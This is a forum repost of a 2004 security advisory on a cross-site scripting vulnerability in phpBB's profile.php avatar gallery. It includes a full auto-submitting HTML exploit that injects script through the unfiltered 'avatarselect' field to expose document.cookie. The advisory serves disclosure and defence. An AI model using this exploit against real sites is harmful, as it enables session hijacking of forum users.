Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 22-03-2004, 21.10.41
Administrator
Amministratore
 
Data registrazione: 12-09-2002
Messaggi: 3,420
serverplan ha disabilitato la reputazione
Predefinito phpBB profile.php Cross Site Scripting Vulnerability

################################################## ###################

Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
Release Date : Mar 21,2004
Application : phpBB
Version : phpBB 2.0.6d or others?
Platform : PHP
Vendor URL : http://www.phpbb.com/
Author : Cheng Peng Su(apple_soup_at_msn.com)

################################################## ###################

Proof of Conecpt:

This vuln is in profile.php,when you click [Show Gallery],phpBB
will show you Avatar gallery,asking you to choose one for yourself.
The hole is in the form,after submitting phpBB will use the value of
"avatarselect" as the path of the gallery directly,without filtering
any illegal characters.

Exploit:

-------------exploit.htm--------------
<form name='f' action="http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
&lt;script&gt;
window.onload=function()
{
document.all.submitavatar.click();
}
&lt;/script&gt;
---------------end-------------------

Contact:

Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com
Rispondi citando
Rispondi

Strumenti discussione
Modalità visualizzazione

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
phyton e ssh per google site maps generator mjfan80 CGI - PERL - SCRIPT 1 31-01-2006 16.16.39
New phpBB ViewTopic.php Cross Site Scripting serverplan Vulnerabilità 0 29-02-2004 01.44.34
Possible Cross Site Scripting in Discuz! Board serverplan Vulnerabilità 0 07-02-2004 10.43.07
CSS Vulnerability in Web Froums Server 1.6 serverplan Vulnerabilità 0 05-02-2004 13.07.44
rxgoogle.cgi XSS Vulnerability serverplan Vulnerabilità 0 05-02-2004 13.07.06


Tutti gli orari sono GMT +1. Adesso sono le 14.34.57.


Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it